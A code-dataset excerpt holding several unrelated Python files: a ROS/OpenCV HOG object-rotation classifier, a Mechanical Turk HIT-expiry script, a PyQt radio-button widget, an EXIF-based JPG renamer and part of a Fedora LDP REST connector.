# extract the rect after rotation has been done\n size_int = (np.int32(size[0]), np.int32(size[1]))\n up_right_rect = cv2.getRectSubPix(rotated, size_int, center)\n # up_right_rect_copy = up_right_rect.copy()\n # cv2.drawContours(up_right_rect_copy, [points], 0, (0, 0, 255), 2)\n # cv2.imshow('uprightRect', up_right_rect_copy)\n objects_detector(up_right_rect)\n\n\ndef get_color_img():\n global color_buffer_msg, color_img, img_bgr8_clean\n\n msg = color_buffer_msg.get_last_img_msg()\n if msg is not None:\n color_img = CvBridge().imgmsg_to_cv2(msg, \"bgr8\")\n img_bgr8_clean = color_img[32:992, 0:1280]\n\n\ndef get_depth_img():\n global depth_buffer_msg, depth_img, depth_img_averaging\n\n msg = depth_buffer_msg.get_last_img_msg()\n if msg is not None:\n clean_img = clean(CvBridge().imgmsg_to_cv2(msg, \"passthrough\"), 255)\n depth_img = clean_img\n depth_img_averaging.new_img(depth_img)\n\n\ndef get_img_rot(img_bgr):\n img_clean_gray_class_local = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)\n best_rot = 0\n best_perc = 0\n # noinspection PyArgumentList\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n for i in range(4):\n # Calculate HoG\n h1 = opencv_hog.compute(img_clean_gray_class_local)\n fd = (np.reshape(h1, (len(h1),)))\n fd = fd.reshape(1, -1)\n for percentage in clf.predict_proba(fd)[0]:\n if percentage > best_perc:\n best_perc = percentage\n best_rot = i\n rows, cols = img_clean_gray_class_local.shape\n m = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n img_clean_gray_class_local = cv2.warpAffine(img_clean_gray_class_local, m, (cols, rows))\n return best_rot\n\n\ndef hog_info():\n global labels\n global hog_list\n print ('Current labels = ')\n myset = set(labels)\n print (str(myset))\n print ('Current HoG size:')\n print (len(hog_list))\n\n\ndef hog_pred():\n global n_bin\n global b_size\n global c_size\n global img_clean_gray_class\n global clf\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n fd = opencv_hog.compute(img_clean_gray_class)\n fd = np.reshape(fd, (len(fd),))\n fd = fd.reshape(1, -1)\n print (clf.predict([fd]))\n\n\ndef learn():\n print ('Learning')\n start_time = time.time()\n global hog_list\n global labels\n classes = np.unique(labels).tolist()\n if implements_p_fit == 1:\n for i in range(10):\n classes.append('new' + str(i))\n print (classes)\n global shuffled_x\n global shuffled_y\n shuffledrange = range(len(labels))\n if implements_p_fit == 1:\n for i in range(5):\n random.shuffle(shuffledrange)\n shuffled_x = [hog_list[i] for i in shuffledrange]\n shuffled_y = [labels[i] for i in shuffledrange]\n print (len(shuffled_x))\n for i2 in range(10):\n print (i2)\n clf.partial_fit(shuffled_x[i2 * len(shuffled_x) / 10:(i2 + 1) * len(shuffled_x) / 10], shuffled_y[i2 * len(shuffled_x) / 10:(i2 + 1) * len(shuffled_x) / 10], classes)\n else:\n shuffledrange = range(len(labels))\n random.shuffle(shuffledrange)\n # SHUFFLED_X = HOG_LIST\n # SHUFFLED_Y = LABELS\n shuffled_x = [hog_list[i] for i in shuffledrange]\n shuffled_y = [labels[i] for i in shuffledrange]\n clf.fit(shuffled_x, shuffled_y)\n print ('Done Learning')\n print('Elapsed Time Learning = ' + str(time.time() - start_time) + '\\n')\n\n\n\ndef learn_from_disk():\n global label\n i = 0\n start_time = 0\n for filename in os.listdir(LRN_PATH):\n if (i % 20) == 0:\n start_time = rospy.get_time()\n imagee = cv2.imread(LRN_PATH + filename)\n learn_hog(imagee)\n if (i % 20) == 0:\n print('Elapsed Time Learning Image ' + str(i) + ' = ' + str(rospy.get_time() - start_time) + '\\n')\n i += 1\n learn()\n print ('Done')\n\n\ndef learn_hog(img):\n global n_bin\n global b_size\n global c_size\n global hog_list\n global labels\n global live_flag\n global show_flag\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n w, l = np.shape(img)\n img_list = list()\n img_list.append((img[:, :])) # no changes\n\n if live_flag == 0:\n for i in range(1, 12, 2):\n img_list.append((img[0:w - i, :])) # cut right\n img_list.append((img[i:, :])) # cut left\n img_list.append((img[:, i:])) # cut up\n img_list.append((img[:, 0:l - i])) # cut down\n img_list.append((img[:, i:l - i])) # cut up and down\n img_list.append((img[i:w - i, :])) # cut left and right\n img_list.append((img[i:, i:l - i])) # cut up and down and left\n img_list.append((img[:w - i, i:l - i])) # cut up and down and right\n img_list.append((img[i:w - i, i:l - i])) # cut up and down and left and right\n else:\n for i in range(3, 12, 3):\n img_list.append((img[0:w - i, :])) # cut right\n img_list.append((img[i:, :])) # cut left\n img_list.append((img[:, i:])) # cut up\n img_list.append((img[:, 0:l - i])) # cut down\n img_list.append((img[:, i:l - i])) # cut up and down\n img_list.append((img[i:w - i, :])) # cut left and right\n img_list.append((img[i:, i:l - i])) # cut up and down and left\n img_list.append((img[:w - i, i:l - i])) # cut up and down and right\n img_list.append((img[i:w - i, i:l - i])) # cut up and down and left and right\n index = 0\n # print('Elapsed Time Pre HoG = ' + str(time.time() - start_time) + '\\n')\n # noinspection PyArgumentList\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n for imgs in img_list:\n imgs = cv2.resize(imgs, (128, 128), interpolation=cv2.INTER_AREA) # resize image\n if show_flag == 1:\n cv2.imshow('img' + str(index), imgs)\n index += 1\n h1 = opencv_hog.compute(imgs)\n h1 = (np.reshape(h1, (len(h1),)))\n hog_list.append((np.reshape(h1, (len(h1),))))\n # print (HOG_LIST)\n # HOG_LIST.append(hog(imgs, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=False))\n if not live_flag == 1:\n labels.append(label)\n else:\n labels.append('new0')\n # print('Elapsed Time on HoG = ' + str(time.time() - start_time) + '\\n')\n\n\ndef load_class():\n global hog_list\n global labels\n global loaded_flag\n\n with open('../data/HOG_N_LABELS/HOG_N_LABELS.pickle') as f:\n hog_tuple = pickle.load(f)\n hog_list = hog_tuple[0]\n labels = hog_tuple[1]\n loaded_flag = 1\n print ('Loaded')\n\n\ndef objects_detector(img_bgr8):\n global b_size\n global c_size\n global callback_rgb_timer\n global clf\n global debug_flag\n global hog_list\n global img_clean_bgr_learn\n global img_clean_gray_class\n global interactions_flag\n global labels\n global last_hog\n global live_cnt\n global live_flag\n global n_bin\n global recording_flag\n global saved_flag\n global saving_learn\n global saving_learn\n global saving_test\n global show_flag\n global shuffled_x\n global shuffled_y\n global start_time2\n\n objects_detector_time = rospy.get_time()\n width, height, d = np.shape(img_bgr8)\n if width > 130 or height > 130:\n return\n if width < 100 or height < 100:\n return\n # noinspection PyUnusedLocal\n detected_objects_list = []\n w, l, d = np.shape(img_bgr8)\n img_clean_bgr_learn = img_bgr8[2:w - 2, 2:l - 2].copy()\n # cv2.imshow('Learn', img_clean_bgr_learn)\n img_bgr8 = img_bgr8[7:w - 4, 9:l - 8]\n img_clean_bgr_class = img_bgr8.copy()\n img_clean_bgr_class = cv2.resize(img_clean_bgr_class, (120, 120), interpolation=cv2.INTER_AREA) # resize image\n img_clean_gray_class = cv2.cvtColor(img_clean_bgr_class, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Clean', img_clean_bgr_class)\n\n if recording_flag == 1:\n\n learn_hog(img_clean_bgr_learn)\n # HOG_LIST.append(last_hog)\n # labels.append(LABEL)\n interactions_flag += 1\n print (interactions_flag)\n if interactions_flag == 20:\n recording_flag = 0\n interactions_flag = 0\n print ('Done recording')\n\n # to learn with human\n if saving_learn == 1:\n cv2.imwrite('LRN_IMGS/' + label + '_' + str(saved_flag) + '_' + color + '.png', img_clean_bgr_learn)\n saved_flag += 1\n print (saved_flag)\n if saved_flag == 3:\n saving_learn = 0\n saved_flag = 0\n print ('Done saving')\n\n cv2.imshow('Save_test', img_clean_bgr_class)\n\n # to learn with human\n if saving_test == 1:\n cv2.imwrite('TST_IMGS/' + label + '_' + str(rotation) + '_' +\n str(saved_flag) + '_' + color + '.png', img_clean_bgr_class)\n saved_flag += 1\n print (saved_flag)\n if saved_flag == 20:\n saving_test = 0\n saved_flag = 0\n print ('Done saving')\n best_rot = 0\n best_perc = 0\n\n # to learn alone\n if live_flag == 1:\n start_time3 = rospy.get_time()\n if live_cnt == 0:\n start_time2 = rospy.get_time()\n live_cnt = 100\n nb_depth_img_callback(1)\n hog_list = list()\n labels = list()\n hog_list.extend(shuffled_x[1:int(len(shuffled_x) * (1.0 / len((np.unique(shuffled_y)))))])\n labels.extend(shuffled_y[1:int(len(shuffled_x) * (1.0 / len(np.unique(shuffled_y))))])\n learn_hog(img_bgr8)\n shuffled_range = range(len(labels))\n shuffled_x_temp = []\n shuffled_y_temp = []\n for i in range(5):\n random.shuffle(shuffled_range)\n shuffled_x_temp = [hog_list[i] for i in shuffled_range]\n shuffled_y_temp = [labels[i] for i in shuffled_range]\n print (live_cnt)\n live_cnt -= 1\n if live_cnt == 0:\n start_time = rospy.get_time()\n clf.partial_fit(shuffled_x_temp, shuffled_y_temp)\n print('Elapsed Time LEARNING = ' + str(rospy.get_time() - start_time) + '\\n')\n live_flag = 0\n nb_depth_img_callback(NB_MAX_DEPTH_IMG)\n print('Elapsed Time TOTAL = ' + str(rospy.get_time() - start_time2)\n + ' FPS = ' + str(100 / (rospy.get_time() - start_time2)) + '\\n')\n print('Elapsed Time Single Example = ' + str(rospy.get_time() - start_time3) + '\\n')\n print('Elapsed Time Single Example Obj Detc = ' + str(rospy.get_time() - objects_detector_time) + '\\n')\n\n print('Elapsed Time Single Example RGB callback = ' + str(rospy.get_time() - callback_rgb_timer) + '\\n')\n\n if show_flag == 0:\n return\n\n # fd, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n # fd = np.reshape(fd, (32, 8))\n # fd_new = np.roll(fd, 2, axis=1)\n # fd_new = np.reshape(fd, (1, 32*8))[0]\n # print ('New')\n # print(fd_new[0:20])\n # print (len(fd_new))\n # rows, cols = img_clean_GRAY_class.shape\n # m = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n # img_clean_bgr_class = cv2.warpAffine(img_clean_bgr_class, m, (cols, rows))\n # fd, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n # print ('Rotated Original')\n # print (fd[0:20])\n # print (len(fd))\n\n # fd2, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n # noinspection PyArgumentList\n opencv_hog = cv2.HOGDescriptor((128, 128), (b_size, b_size), (b_stride, b_stride), (c_size, c_size), n_bin)\n\n for i in range(4):\n # fd2_ori = fd2.copy()\n # fd2 = fd2.reshape(1, -1)\n # fd, hog_image = hog(img_clean_GRAY_class, orientations=n_bin, pixels_per_cell=(c_size, c_size),\n # cells_per_block=(b_size / c_size, b_size / c_size), visualise=True)\n\n img_clean_gray_class = cv2.resize(img_clean_gray_class, (128, 128))\n\n fd4 = opencv_hog.compute(img_clean_gray_class)\n\n # fd_ori = fd.copy()\n fd4 = fd4.reshape(1, -1)\n for percentage in clf.predict_proba(fd4)[0]:\n if percentage > best_perc:\n best_perc = percentage\n best_rot = i\n # fd = fd_ori\n # fd2 = fd2_ori\n rows, cols = img_clean_gray_class.shape\n m = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n img_clean_gray_class = cv2.warpAffine(img_clean_gray_class, m, (cols, rows))\n # fd2 = np.reshape(fd2, (32, 8))\n # if not i == 0:\n # fd2 = np.roll(fd2, 2, axis=1)\n # fd2 = np.reshape(fd2, (1, 32*8))[0]\n # print ('Original')\n # print (fd[0:20])\n # print ('Fake')\n # print (fd2[0:20])\n if debug_flag == 1:\n # print clf.predict(fd)\n print (best_perc)\n print ('\\n')\n\n # print (best_rot)\n if not best_rot == 0:\n rows, cols, d = img_clean_bgr_class.shape\n m = cv2.getRotationMatrix2D((cols / 2, rows / 2), best_rot * 90, 1)\n img_clean_bgr_class = cv2.warpAffine(img_clean_bgr_class, m, (cols, rows))\n cv2.imshow('Sent', cv2.resize(img_clean_bgr_class, (256, 256)))\n\n # detected_object = Detected_Object()\n # detected_object.id = count\n # detected_object.image = CvBridge().cv2_to_imgmsg(img_bgr8_resized, encoding=\"passthrough\")\n # detected_object.center_x = unrot_center_x / float(resolution_x) # proportion de la largeur\n # detected_object.center_y = unrot_center_y / float(resolution_x) # proportion de la largeur aussi\n # detected_object.features = getpixelfeatures(object_img_rgb)\n # detected_object.features.hog_histogram = GetHOGFeatures(object_img_rgb)\n # detected_objects_list.append(detected_object)\n # if interactive == 1:\n # if len(detected_objects_list) > 1:\n # VAL_DEPTH_CAPTURE -= 0.01\n # if len(detected_objects_list) < 1:\n # VAL_DEPTH_CAPTURE += 0.01\n # detected_objects_list_msg = Detected_Objects_List()\n # detected_objects_list_msg.detected_objects_list = detected_objects_list\n # detected_objects_list_publisher.publish(detected_objects_list_msg)\n\n # cv2.rectangle(img_copy, (margin, margin), (resolution_x - margin, resolution_y - margin), (255, 255, 255))\n # cv2.imshow('detected_object', img_copy)\n # try:\n # img_bgr8_resized\n # except NameError:\n # pass\n # else:\n # if 1:\n # cv2.imshow('a', img_bgr8_resized)\n # cv2.imshow('ROTATED', rotated_img_obj)\n # cv2.imshow('With Cnt', object_img_rgb2)\n # cv2.waitKey(1)\n\n\ndef save_hog():\n global clf\n hog_tuple = (hog_list, labels)\n # print ('Hog = ' + str(hog_tuple[0]))\n print ('labels = ' + str(np.unique(hog_tuple[1])))\n # clf.fit(hog_tuple[0], hog_tuple[1])\n with open('HOG_N_LABELS/HOG_N_LABELS.pickle', 'w') as f:\n pickle.dump(hog_tuple, f)\n # joblib.dump(clf, 'Classifier/filename.pkl')\n print ('Done')\n\n\ndef save_img_learn():\n global label, color, saving_learn\n mode = str(raw_input('Label: '))\n label = mode\n color_ = str(raw_input('Color: '))\n color = color_\n saving_learn = 1\n\n\ndef save_img_test():\n global label, color, rotation, saving_test\n mode = str(raw_input('Label: '))\n label = mode\n color_ = str(raw_input('Color: '))\n color = color_\n rotation = str(raw_input('Rotation: '))\n saving_test = 1\n\n\ndef show_color_img():\n if show_color_img_flag == 1:\n cv2.namedWindow(\"Color Img\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"Color Img\", color_img)\n else:\n cv2.destroyWindow(\"Color Img\")\n\n\ndef show_controls_window():\n print(\"Show controls' window\")\n cv2.namedWindow(MAIN_WINDOW, cv2.WINDOW_NORMAL)\n\n cv2.createTrackbar(RUN_NAME, MAIN_WINDOW, 0, 1, run_callback)\n cv2.createTrackbar(SHOW_COLOR_IMG, MAIN_WINDOW, 0, 1, show_color_img_callback)\n cv2.createTrackbar(SHOW_DEPTH_IMG, MAIN_WINDOW, 0, 1, show_depth_img_callback)\n cv2.createTrackbar(LEARN_FROM_DISK, MAIN_WINDOW, 0, 1, learn_from_disk_callback)\n cv2.createTrackbar(TEST_FROM_DISK, MAIN_WINDOW, 0, 1, test_from_disk_callback)\n cv2.createTrackbar(UNKNOWN_OBJECT, MAIN_WINDOW, 0, 1, unknown_object_callback)\n cv2.createTrackbar('Capture Range', MAIN_WINDOW, int(100 * depth_capture), 150, depth_capture_callback)\n\n cv2.imshow(MAIN_WINDOW, 0)\n\n\ndef show_depth_img():\n if show_depth_img_flag == 1:\n cv2.namedWindow(\"Depth Img\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"Depth Img\", depth_img)\n # cv2.imshow(\"Depth Img\", depth_img_averaging.average())\n else:\n cv2.destroyWindow(\"Depth Img\")\n\n\ndef test_from_disk():\n print ('Testing from disk')\n start_time = rospy.get_time()\n total = 0\n failure = 0\n for filename in os.listdir(TEST_PATH):\n total += 1\n rotation_num = int(filename.rsplit('_', 3)[1])\n # print ('Label ' + str(LABEL))\n # print 'Rotation ' + str(ROTATION)\n imagee = cv2.imread(TEST_PATH + filename)\n imagee = cv2.resize(imagee, (128, 128))\n found_rot = get_img_rot(imagee)\n if not abs(rotation_num - found_rot) < 0.5:\n # print ('Testing ' + str(filename))\n failure += 1\n # print ('Does not work')\n # cv2.imshow('Did not work',imagee)\n # cv2.waitKey(100)\n # print (found_rot)\n # print (ROTATION)\n percentage = 100 * failure / total\n print ('Failure = ' + str(percentage) + '%')\n print ('Failures = ' + str(failure))\n print('Elapsed Time Testing = ' + str(rospy.get_time() - start_time) + '\\n')\n print ('Done')\n\n\n#################\n# Main function #\n#################\n\nif __name__ == '__main__':\n rospy.init_node('imageToObjects_inQuickTime', anonymous=True)\n\n rospy.Timer(rospy.Duration(0.02), main_callback)\n\n show_controls_window()\n\n color_buffer_msg.set_subscriber(\"/camera/rgb/image_rect_color\")\n depth_buffer_msg.set_subscriber(\"/camera/depth_registered/image_raw\")\n\n depth_buffer_msg.run()\n color_buffer_msg.run()\n\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print (\"Shutting down\")\n exit(1)\n cv2.destroyAllWindows()\n","sub_path":"catkin_ws/src/robot_interaction_experiment/scripts/Not_used/imageToObjects_inQuickTime.py","file_name":"imageToObjects_inQuickTime.py","file_ext":"py","file_size_in_byte":25772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"601273926","text":"\"\"\"\nGoes through assignments and queries the status for reviews\n\"\"\"\n\nimport argparse\nimport collections\nimport json\nimport sys\nimport mturk_utils as m\nimport boto3\nimport functools\nclient = None\n\ndef parse_args():\n parser = argparse.ArgumentParser('Expire HITs')\n parser.add_argument('hits', type=str, help='file with one hit id per line')\n parser.add_argument('--is-sandbox', action='store_true', default=False)\n return parser.parse_args()\n\ndef main():\n is_sandbox = OPTS.is_sandbox\n global client\n client = m.get_mturk_client(is_sandbox=is_sandbox)\n print(client.get_account_balance()['AvailableBalance'])\n hits = open(OPTS.hits, 'r').readlines()\n for h in hits:\n expire(h.strip())\n\ndef expire(hit_id):\n status = 'NA'\n prev_status = 'NA'\n try:\n response = client.get_hit(HITId=hit_id)\n prev_status = response['HIT']['Expiration']\n response = client.update_expiration_for_hit(\n HITId=hit_id,\n ExpireAt=datetime(2015, 1, 1)\n )\n status = response['HIT']['Expiration']\n except client.exceptions.RequestError as e:\n status = 'RequestError: ' + str(e)\n print(prev_status, '->', status)\n\n\nif __name__ == '__main__':\n OPTS = parse_args()\n main()\n","sub_path":"scripts/expire_hits.py","file_name":"expire_hits.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"121417810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import pyqtSignal\nimport sys, os.path as op\npath1 = op.join( op.abspath(op.dirname(__file__)), '..', '..')\npath2 = op.join( op.abspath(op.dirname(__file__)), '..')\nsys.path.append(path1)\nsys.path.append(path2)\nfrom Structure import *\nfrom .MainCategoriesVision import *\nfrom .MainAlternativesVision import *\nfrom SubCriteriasVision import *\n\nclass MainRadioButton( QtWidgets.QWidget ):\n ''' Окно режима объекта'''\n \n is_changed = pyqtSignal()\n def __init__( self, main_obj, parent=None ):\n \n super().__init__( parent=parent )\n \n self.main_obj = main_obj\n \n #Делаем надпись и две радиокнопки\n label = QtWidgets.QLabel(\"Сложность модели\")\n \n setTrueButton = QtWidgets.QRadioButton(\"Две категории\")\n setFalseButton = QtWidgets.QRadioButton(\"Четыре категории\")\n \n #Соединяем одну из кнопок с методов и ставим указатель на ней\n setTrueButton.toggled.connect( self.setTrue )\n setTrueButton.setChecked(True)\n \n box = QtWidgets.QHBoxLayout()\n box.addWidget(setTrueButton)\n box.addWidget(setFalseButton)\n \n form = QtWidgets.QFormLayout()\n form.addRow(label)\n form.addRow(box)\n \n self.setLayout( form )\n \n def setTrue( self, is_right ):\n if is_right:\n self.main_obj.is_simple = True\n else:\n self.main_obj.is_simple = False\n self.is_changed.emit()\n","sub_path":"src/gui/MainWindow/MainRadioButton.py","file_name":"MainRadioButton.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"521008486","text":"import glob\nimport os\nimport traceback\nfrom PIL import ExifTags, Image\n\n\n# WORK_DIR = '/storage/emulated/0/DCIM/Camera'\n# WORK_DIR = 'D:\\\\Pictures\\\\Sony Z1'\nWORK_DIR = os.path.dirname(__file__)\nJPG_FILTER = os.path.join(WORK_DIR, '*.[jJ][pP][gG]')\n\n\ndef get_exif_time(file):\n img = Image.open(file)\n date_time = ''\n try:\n exif = {\n ExifTags.TAGS[k]: v\n for k, v in img._getexif().items()\n if k in ExifTags.TAGS\n }\n date_time = exif['DateTime']\n except Exception as err:\n print(err)\n print(traceback.format_exc())\n date_time = date_time.replace(':', '').replace(' ', '_').strip()\n return date_time\n\n\ndef rename_jpg(file, date_time):\n new_name = 'IMG_' + date_time + '.jpg'\n new_name = os.path.join(WORK_DIR, new_name)\n i = 1\n while os.path.exists(new_name):\n if file.lower() == new_name.lower():\n return 'Not Renamed'\n new_name = 'IMG_' + date_time + '_' + str(i) + '.jpg'\n new_name = os.path.join(WORK_DIR, new_name)\n i += 1\n try:\n os.rename(file, new_name)\n except Exception as err:\n print(err)\n print(traceback.format_exc())\n return 'ERROR'\n return os.path.split(new_name)[1]\n\n\ndef rename_jpgs():\n filecount = 0\n filetotal = len(glob.glob(JPG_FILTER))\n for file in glob.glob(JPG_FILTER):\n filecount += 1\n date_time = get_exif_time(file)\n if date_time == '':\n print(os.path.split(file)[1], 'No Exif Date', '(%d/%d)' % (filecount, filetotal))\n else:\n new_name = rename_jpg(file, date_time)\n print(os.path.split(file)[1], '-->', new_name, '(%d/%d)' % (filecount, filetotal))\n\n\nif __name__ == '__main__':\n rename_jpgs()\n","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"347907043","text":"import logging\nimport requests\n\nfrom itertools import chain\nfrom os.path import basename\nfrom rdflib import Graph, URIRef, Literal\n\nfrom combine.config.datasources import lake_rest_api\nfrom combine.connectors.http_connector import HttpConnector\nfrom combine.config.namespaces import ns_collection as nsc\nfrom combine.config.namespaces import ns_mgr as nsm\n\nclass LakeConnector(HttpConnector):\n '''@package combine.connectors\n\n Handles communication with the LAKE (Fedora) REST API.\n '''\n _logger = logging.getLogger(__module__)\n\n\n @property\n def conf(self):\n '''LAKE host configuration.\n\n @return dict\n '''\n\n return lake_rest_api\n\n\n def __init__(self):\n '''Class constructor.\n\n Set authorization parameters based on incoming auth headers.\n\n @return None\n '''\n self.auth = requests.auth.HTTPBasicAuth(*self.conf['auth']) \\\n if 'auth' in self.conf else None\n\n\n def post_ldpr(self, parent='/', g=None, slug=None):\n '''Create a new LDP resource via POST.\n\n @param g (rdflib.graph.Graph) Graph of properties to populate resource.\n @param slug (string) Path relative to REST API root.\n\n @return string Location of new resource.\n '''\n self.headers['slug'] = slug\n self.headers['content-type'] = 'text/turtle'\n self._logger.debug('Sending RDF graph: {}'.format(g.serialize(None, 'turtle')))\n\n res = self.request('post', self.conf['base_url'] + parent,\n auth=self.auth, headers=self.headers,\n verify=self.conf['ssl_verify'],\n data=g.serialize(None, 'turtle'))\n\n loc = res.headers['location']\n self._logger.info('Ingested resource with POST at: {}'.format(loc))\n\n return loc\n\n\n def put_ldpr(self, uri, g=None):\n '''Create or update an LDP resource via PUT.\n\n @param uri (string) resource URI.\n @param g (rdflib.graph.Graph) Graph of properties to populate resource.\n @param slug (string) Path relative to REST API root.\n\n @return string Location of new resource.\n '''\n g = g or Graph()\n\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['fedora'].Resource)))\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['ldp'].RDFSource)))\n\n self._logger.debug('Graph sent for LDPR creation: {}'.\n format(g.serialize(format='turtle')))\n\n self.headers['content-type'] = 'text/turtle'\n self._logger.debug('Sending RDF graph: {}'.format(\n g.serialize(None, 'turtle')))\n\n res = self.request('put', uri,\n auth=self.auth, headers=self.headers,\n verify=self.conf['ssl_verify'],\n data=g.serialize(None, 'turtle'))\n\n loc = res.headers['location']\n self._logger.info('Ingested resource with PUT at: {}'.format(loc))\n\n return loc\n\n\n def patch_ldpr(self, uri, q=None):\n '''Patch an existing LDP resource with a SPARQL-Update query.\n\n @param q (string) SPARQL-Update query.\n @param uri (string) Resource URI.\n\n @return None\n '''\n self.headers['content-type'] = 'application/sparql-update'\n\n res = self.request('patch', uri, auth=self.auth,\n verify=self.conf['ssl_verify'], headers=self.headers,\n data=bytes(q, 'utf-8'))\n\n return res\n\n\n def put_ldpc(self, uri, g=None,\n mm_res=None, mm_rel=None, ins_cont_rel=None):\n '''Create or update a new LDP base, direct or indirect container via\n PUT.\n\n @param uri (string) resource URI.\n @param g (rdflib.graph.Graph) Graph of properties to populate resource.\n @param mm_res (string) URI of membership subject.\n @param mmm_rel (string) URI of membership relation. If both this and\n mm_res are set, the resource is considered a direct container.\n @param ins_cont_rel (string) URI of inserted content relation. If this,\n mm_res and mm_rel are set, the resource is an indirectcontainer.\n\n @return string Location of new resource.\n '''\n g = g or Graph()\n if mm_res and mm_rel:\n if ins_cont_rel:\n ctype = URIRef(nsc['ldp'].IndirectContainer)\n g.add((URIRef(''), nsc['ldp'].insertedContentRelation,\n ins_cont_rel))\n g.add((URIRef(''), nsc['fedorasystem'].hasModel,\n Literal('ActiveFedora::IndirectContainer',\n datatype=nsc['xsd'].string)))\n else:\n ctype = URIRef(nsc['ldp'].DirectContainer)\n\n g.add((URIRef(''), nsc['ldp'].membershipResource, mm_res))\n g.add((URIRef(''), nsc['ldp'].hasMemberRelation, mm_rel))\n g.add((URIRef(''), nsc['rdf'].type,\n URIRef(nsc['aic'].CitiResource)))\n g.add((URIRef(''), nsc['rdf'].type, ctype))\n\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['fedora'].Container)))\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['ldp'].Container)))\n\n return self.put_ldpr(uri, g)\n\n\n def assert_res_exists(self, uri):\n '''Check if a resource exists already.\n\n @param uri (string) URI to check.\n\n @return (boolean) Whether node exists.\n\n @throw HTTPError If the request is invalid (i.e. any other HTTP\n error than 404)\n '''\n\n try:\n res = self.request('head', uri, auth=self.auth,\n headers=self.headers, verify=self.conf['ssl_verify'])\n return True\n except requests.exceptions.HTTPError as e:\n if str(e)[:3] == '404':\n return False\n else:\n raise\n\n\n def open_transaction(self):\n '''Open Fedora transaction.\n\n @return (string) The transaction URI.\n '''\n\n res = self.request(\n 'post',\n self.conf['base_url'] + '/fcr:tx',\n headers = self.headers\n )\n res.raise_for_status()\n\n return res.headers['location']\n\n\n def get_binary_stream(self, uri):\n '''Get a binary stream.'''\n\n res = self.request('get',uri, headers=self.headers)\n res.raise_for_status()\n\n return res\n\n\n def create_or_update_node(self, uri=None, parent='/', props=None):\n '''Create a container node if it does not exist,\n or update it if it exists already.\n\n @param uri (string, optional) URI of the node to be created or updated.\n @param parent (string, optional) Parent path relative to\n repository root. Default is '/'.\n @param props (dict, optional) Dictionary of properties to be\n associated with the node.\n\n @return (string) New node URI.\n '''\n if props:\n g = Graph(namespace_manager=nsm)\n cherrypy.log('Received prop tuples: {}'.format(props))\n for t in props['tuples'][1]:\n g.add((URIRef(''), t[0], t[1]))\n\n body = g.serialize(format='turtle')\n else:\n body = ''\n\n if uri:\n res = self.request('put',\n uri,\n data = body,\n headers = dict(chain(self.headers.items(),\n [('Content-type', 'text/turtle')]\n ))\n )\n else:\n cherrypy.log('Creating node by POST with RDF properties: {}'.\\\n format(body))\n res = self.request('post',\n parent,\n data = body,\n headers = dict(chain(self.headers.items(),\n [('Content-type', 'text/turtle')]\n ))\n )\n if res.status_code > 399:\n cherrypy.log('HTTP Error: {}'.format(res.text))\n res.raise_for_status()\n\n return res.headers['location']\n\n\n def create_or_update_datastream(\n self, uri, file_name, ds=None, path=None,\n mimetype='application/octet-stream'):\n '''Create a datastream under an existing container\n node if it does not exist, or update it if it exists already.\n\n @param uri (string) URI of the datastream node to be created or updated.\n @param file_name (string) Name of the datastream as a downloaded file.\n @param ds (BytesIO, optional) Datastream to be ingested.\n Alternative to \\p path.\n @param path (string, optional) Path to the datastream.\n Alternative to \\p ds.\n @param mimetype (string, optional) MIME type of the datastream.\n Default: application/octet-stream\n\n @return (string | None) New node URI if a new node is created.\n '''\n\n # @TODO Optimize with with\n if not ds and not path:\n raise cherrypy.HTTPError(\n '500 Internal Server Error', \"No datastream or file path given.\"\n )\n\n data = ds or open(path, 'rb')\n #cherrypy.log('Data peek: {}'.format(data))\n\n cherrypy.log('Ingesting datastream from class type: {}'\\\n .format(data.__class__.__name__))\n res = self.request('put',\n uri,\n data = data.read(),\n headers = dict(chain(\n self.headers.items(),\n [\n ('content-disposition', 'inline; filename=\"' + file_name + '\"'),\n ('content-type', mimetype),\n ]\n ))\n )\n #cherrypy.log('Request headers: {}'.format(res.request.headers))\n #cherrypy.log('Response headers: {}'.format(res.headers))\n res.raise_for_status()\n\n if 'location' in res.headers:\n return res.headers['location']\n\n\n def create_or_update_ref_datastream(self, uri, ref):\n '''Create or update a datastream with an externally referenced content.\n\n @param uri (string) URI of the datastream node to be created or updated.\n @param ref (string) External source as a HTTP 